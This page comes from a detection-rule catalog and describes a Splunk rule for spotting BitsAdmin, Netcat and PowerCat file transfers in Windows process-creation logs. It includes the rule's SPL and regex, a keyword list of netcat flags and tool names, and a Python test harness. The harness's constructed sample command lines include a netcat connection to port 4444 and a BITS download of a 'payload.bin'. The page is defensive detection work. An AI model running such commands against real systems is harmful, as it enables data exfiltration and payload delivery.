BitsAdmin NetCat PowerCat File Transfer (Windows Event Log)
This use case searches for specific keywords generated when a file transfer using Bitsadmin, Netcat or PowerCat is made to send data to or from an external source.
MITRE ATT&CK coverage
| Tactic | Techniques |
|---|---|
| Execution | T1197 BITS Jobs |
| Persistence | T1197 BITS Jobs |
| Defense Evasion | T1197 BITS Jobs |
| Command & Control | T1071.002 Application Layer Protocol: File Transfer Protocols |
Event coverage
| Provider | Event | Title |
|---|---|---|
| Security-Auditing | Event ID 4688 | A new process has been created. |
Rule body (YAML)
id: '1067.1102'
title: BitsAdmin NetCat PowerCat File Transfer
description: 'This use case is searching for specific keywords that are generated
when a file transfer using Bitsadmin, Netcat or PowerCat is made to send data to/from
an external source. -- Threat Actor Association: Cadet Blizzard - Software Association:
Black Basta -- Atomics T1105 Test #9'
logic_format: Splunk
logic: '`get_endpoint_data` `get_endpoint_data_winevent` (("/transfer" OR "/addfile"
OR "Start-BitsTransfer" OR " -vw " OR " -vn " OR " -vwn " OR " -vnw " OR " -w "
OR " -wv " OR " -wn " OR " -wvn " OR " -wnv " OR " -N " OR " -Nv " OR " -Nw " OR
" -Nvw " OR " -Nwv " OR " --send-only") OR ("nc64" OR "nc32" OR "netcat64" OR "netcat32"
OR "ncat" OR "nc" OR "netcat")) | regex process="(\s+\-[Nvw]+\s+\d+?.*?(((\d{1,3}\.){3}\d{1,3})|(\w?\wtps?\:(\/\/|\x5c\x5c)))\s+\d{2,5})|(?i)((ncat|nc|nc64|nc32|netcat64|netcat32|netcat)(\s+|\.exe).*?\-[Nvw]+\s+\d+?.*?(((\d{1,3}\.){3}\d{1,3})|(\w?\wtps?\:(\/\/|\x5c\x5c)))\s+\d{2,5})|(\s+\/(transfer)\s+.*?\w{3,5}\:\/\/)|(?i)(--send-only\s+?$)|(?i)(Start-BitsTransfer)|\s+\/(addfile)\s+"
| rex field=process max_match=1 "\s+(?<dest_ip>((([a-f0-9:]+:+)+[a-f0-9]+)|((\d{1,3}\.){3}\d{1,3})))\s+" |
rex field=dest_ip mode=sed "s/([\n|\r|\s])//g" | table _time, host, user, process,
process_*, parent_*, dest_ip | bin span=1s | stats values(*) as * by _time, host
| search NOT dest_ip IN(10.0.0.0/8, 127.0.0.0/8, 169.254.0.0/16, 172.16.0.0/12,
192.168.0.0/16, 224.0.0.0/4, 255.255.255.255, "::1", "FE80::/10", "FF00::/8") '
techniques:
- command-and-control:application layer protocol:file transfer protocols
- persistence:bits jobs
- defense-evasion:bits jobs
technique_id:
- T1071.002
- T1197
data_category:
- Windows event logs
references: null
Stages and Predicates
Stage 1: search
search source="*" source IN ("WinEventLog:Security", "XmlWinEventLog:Security")
Stage 2: regex
regex match(process, "(\s+\-[Nvw]+\s+\d+?.*?(((\d{1,3}\.){3}\d{1,3})|(\w?\wtps?\:(\/\/|\x5c\x5c)))\s+\d{2,5})|(?i)((ncat|nc|nc64|nc32|netcat64|netcat32|netcat)(\s+|\.exe).*?\-[Nvw]+\s+\d+?.*?(((\d{1,3}\.){3}\d{1,3})|(\w?\wtps?\:(\/\/|\x5c\x5c)))\s+\d{2,5})|(\s+\/(transfer)\s+.*?\w{3,5}\:\/\/)|(?i)(--send-only\s+?$)|(?i)(Start-BitsTransfer)|\s+\/(addfile)\s+")
Stage 3: rex
rex field=process ... -> dest_ip
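The stage 2 regex, the stage 3 dest_ip extraction and the final private-range exclusion, re-implemented in Python as an added example (not part of this rule or its catalog) so the logic can be exercised offline on constructed Event ID 4688 command lines. It assumes simplified, case-insensitive versions of the rule's patterns (IPv4 target only for the netcat branch, plus a word boundary in front of the tool name); the sample command lines are constructed, not real telemetry.

```python
import ipaddress
import re

# Constructed sample 4688 command lines (not real telemetry); the last two should be dropped.
SAMPLE_PROCESSES = [
    "nc.exe -w 3 203.0.113.10 4444",
    "bitsadmin.exe /transfer job https://example.invalid/payload.bin C:\\Users\\Public\\p.bin",
    'powershell.exe -c "Start-BitsTransfer -Source https://example.invalid/a.txt -Destination C:\\a.txt"',
    "nc -vn 10.0.0.5 8080",                      # matches stage 2, removed by the private-range search
    "notepad.exe C:\\Users\\alice\\notes.txt",   # no keyword at all
]

# Stage 2 (adapted): netcat-family binary, -N/-v/-w flag group, IPv4 target, then a port.
# The leading word boundary is an addition so that e.g. "sync.exe" cannot match "nc.exe";
# the rule's URL-scheme alternative for the target is omitted here.
NETCAT_RE = re.compile(
    r"\b(?:ncat|nc|nc64|nc32|netcat64|netcat32|netcat)(?:\s+|\.exe).*?-[Nvw]+\s+.*?"
    r"((?:\d{1,3}\.){3}\d{1,3})\s+\d{2,5}",
    re.IGNORECASE,
)
# Stage 2, BITS branches: /transfer with a URL, --send-only at end of line, Start-BitsTransfer, /addfile.
BITS_RE = re.compile(
    r"\s/transfer\s.*?\w{3,5}://|--send-only\s*$|Start-BitsTransfer|\s/addfile\s", re.IGNORECASE
)
# Stage 3: the first whitespace-delimited IPv6 or IPv4 literal becomes dest_ip.
DEST_IP_RE = re.compile(r"\s((?:[a-f0-9:]+:+)+[a-f0-9]+|(?:\d{1,3}\.){3}\d{1,3})\s", re.IGNORECASE)
# Final search stage: rows whose dest_ip falls in these internal/reserved ranges are discarded.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "224.0.0.0/4", "255.255.255.255/32", "::1/128", "fe80::/10", "ff00::/8")]


def extract_dest_ip(process: str):
    m = DEST_IP_RE.search(process)
    return m.group(1) if m else None


def is_internal(ip_text: str) -> bool:
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:  # rex grabbed a token that is not a valid address
        return False
    return any(ip in net for net in INTERNAL_NETS)


def rule_matches(process: str) -> bool:
    """True if this command line would survive every stage of the rule."""
    if not (NETCAT_RE.search(process) or BITS_RE.search(process)):
        return False
    dest = extract_dest_ip(process)
    # Splunk's `search NOT dest_ip IN(...)` keeps rows where dest_ip is absent (e.g. URL targets).
    return dest is None or not is_internal(dest)


if __name__ == "__main__":
    for p in SAMPLE_PROCESSES:
        print("ALERT " if rule_matches(p) else "ignore", p)
```

Running it alerts on the first three constructed lines and ignores the internal netcat target and the unrelated process, which is the behaviour the rule's four stages describe.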
Indicators
Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.
| Field | Kind | Values |
|---|---|---|
| process | regex_match | Stage 2 regex (see above) |
Search terms
Bare-string tokens in the SPL search body. Splunk matches each token against _raw (the untyped raw event text) anywhere it appears, not against a specific field. These don't surface in the Indicators table because they aren't predicates on a known field.
| Stage | Term |
|---|---|
| 1 | "/transfer" |
| 1 | "/addfile" |
| 1 | "Start-BitsTransfer" |
| 1 | " -vw " |
| 1 | " -vn " |
| 1 | " -vwn " |
| 1 | " -vnw " |
| 1 | " -w " |
| 1 | " -wv " |
| 1 | " -wn " |
| 1 | " -wvn " |
| 1 | " -wnv " |
| 1 | " -N " |
| 1 | " -Nv " |
| 1 | " -Nw " |
| 1 | " -Nvw " |
| 1 | " -Nwv " |
| 1 | " --send-only" |
| 1 | "nc64" |
| 1 | "nc32" |
| 1 | "netcat64" |
| 1 | "netcat32" |
| 1 | "ncat" |
| 1 | "nc" |
| 1 | "netcat" |